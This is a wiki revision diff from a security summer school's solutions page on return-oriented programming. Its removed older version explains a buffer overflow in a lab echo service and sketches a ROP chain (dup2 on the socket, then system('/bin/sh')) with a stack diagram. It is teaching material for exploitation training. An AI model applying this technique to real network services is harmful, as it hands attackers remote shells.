Security Summer School

User Tools

Site Tools

session:solution:12

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
session:solution:12 [2015/07/23 12:20] – [Echo Service] Razvan Deaconescusession:solution:12 [2020/07/19 09:49] (current) – external edit 127.0.0.1
Line 1: Line 1:
-====== Session 12 Solutions ====== +====== 0x0B. Return Oriented Programming (part 2) (Solutions======
- +
-===== Gadget Tut ===== +
- +
-TODO +
- +
-===== Echo Service ===== +
- +
-<note> +
-The log file created with [[http://man7.org/linux/man-pages/man1/script.1.html|script]] is {{TODO|this}}. You may use ''cat'' over the script file to print it. +
-</note> +
- +
-By going through the ''echo_service.c'' file we see that in the ''echo_service()'' function we use ''read()'' for reading ''4096'' bytes when we only have ''1024'' available for a the ''buf'' buffer. We can use this to create a return-oriented programming (ROP) attack. +
- +
-Let's first consider our steps. +
-  - We will create a payload that overflows the ''buf'' buffer and rewrites the return address of the ''echo_service()'' function triggering the attack (the ROP chain). +
-  - We will update the payload issue the following calls through the ROP chain, as also indicated in the task: +
-    - ''dup2(sockfd, 1);'' +
-    - ''dup2(sockfd, 0);'' +
-    - ''system("/bin/sh");'' +
-  - We will start the server and then we will use ''netcat'' to send the payload to the server to trigger the attack. +
- +
-We aim for the stack to be the one below:<code> +
-0x00000000 +
-... +
-start address of buf +
-... +
-+--------------------------------+ +
-|   dup2() address                 <--- return address for echo_service() +
-+--------------------------------+ +
-|   pop_pop_ret gadget address   | +
-+--------------------------------+ +
-|                              | +
-+--------------------------------+ +
-|                              | +
-+--------------------------------+ +
-|   dup2() address               | +
-+--------------------------------+ +
-|   pop_pop_ret gadget address   | +
-+--------------------------------+ +
-|                              | +
-+--------------------------------+ +
-|                              | +
-+--------------------------------+ +
-|   system() address             | +
-+--------------------------------+ +
-|   junk                         | +
-+--------------------------------+ +
-|   "/bin/sh" address            | +
-+--------------------------------+ +
- +
-... +
-0xFFFFFFFF +
-</code>+
  
 +[[http://security.cs.pub.ro/summer-school/res/arc/12-return-oriented-programming-advanced-sol.zip|Solutions archive]]
session/solution/12.1437654050.txt.gz · Last modified: (external edit)